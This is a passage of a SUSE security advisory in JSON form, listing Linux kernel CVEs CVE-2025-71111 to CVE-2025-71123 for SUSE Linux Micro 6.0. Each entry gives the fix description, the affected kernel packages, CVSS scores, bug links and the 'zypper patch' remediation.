"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71111",
"url": "https://www.suse.com/security/cve/CVE-2025-71111"
},
{
"category": "external",
"summary": "SUSE Bug 1256728 for CVE-2025-71111",
"url": "https://bugzilla.suse.com/1256728"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71111"
},
{
"cve": "CVE-2025-71112",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71112"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hns3: add VLAN id validation before using\n\nCurrently, the VLAN id may be used without validation when\nreceive a VLAN configuration mailbox from VF. The length of\nvlan_del_fail_bmap is BITS_TO_LONGS(VLAN_N_VID). It may cause\nout-of-bounds memory access once the VLAN id is bigger than\nor equal to VLAN_N_VID.\n\nTherefore, VLAN id needs to be checked to ensure it is within\nthe range of VLAN_N_VID.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71112",
"url": "https://www.suse.com/security/cve/CVE-2025-71112"
},
{
"category": "external",
"summary": "SUSE Bug 1256726 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256726"
},
{
"category": "external",
"summary": "SUSE Bug 1256727 for CVE-2025-71112",
"url": "https://bugzilla.suse.com/1256727"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-71112"
},
{
"cve": "CVE-2025-71114",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71114"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvia_wdt: fix critical boot hang due to unnamed resource allocation\n\nThe VIA watchdog driver uses allocate_resource() to reserve a MMIO\nregion for the watchdog control register. However, the allocated\nresource was not given a name, which causes the kernel resource tree\nto contain an entry marked as \"\u003cBAD\u003e\" under /proc/iomem on x86\nplatforms.\n\nDuring boot, this unnamed resource can lead to a critical hang because\nsubsequent resource lookups and conflict checks fail to handle the\ninvalid entry properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71114",
"url": "https://www.suse.com/security/cve/CVE-2025-71114"
},
{
"category": "external",
"summary": "SUSE Bug 1256752 for CVE-2025-71114",
"url": "https://bugzilla.suse.com/1256752"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71119"
},
{
"cve": "CVE-2025-71120",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71120"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf\n\nA zero length gss_token results in pages == 0 and in_token-\u003epages[0]\nis NULL. The code unconditionally evaluates\npage_address(in_token-\u003epages[0]) for the initial memcpy, which can\ndereference NULL even when the copy length is 0. Guard the first\nmemcpy so it only runs when length \u003e 0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71120",
"url": "https://www.suse.com/security/cve/CVE-2025-71120"
},
{
"category": "external",
"summary": "SUSE Bug 1256779 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "external",
"summary": "SUSE Bug 1256780 for CVE-2025-71120",
"url": "https://bugzilla.suse.com/1256780"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-71120"
},
{
"cve": "CVE-2025-71123",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71123"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix string copying in parse_apply_sb_mount_options()\n\nstrscpy_pad() can\u0027t be used to copy a non-NUL-term string into a NUL-term\nstring of possibly bigger size. Commit 0efc5990bca5 (\"string.h: Introduce\nmemtostr() and memtostr_pad()\") provides additional information in that\nregard. So if this happens, the following warning is observed:\n\nstrnlen: detected buffer overflow: 65 byte read of buffer size 64\nWARNING: CPU: 0 PID: 28655 at lib/string_helpers.c:1032 __fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nModules linked in:\nCPU: 0 UID: 0 PID: 28655 Comm: syz-executor.3 Not tainted 6.12.54-syzkaller-00144-g5f0270f1ba00 #0\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\nRIP: 0010:__fortify_report+0x96/0xc0 lib/string_helpers.c:1032\nCall Trace:\n \u003cTASK\u003e\n __fortify_panic+0x1f/0x30 lib/string_helpers.c:1039\n strnlen 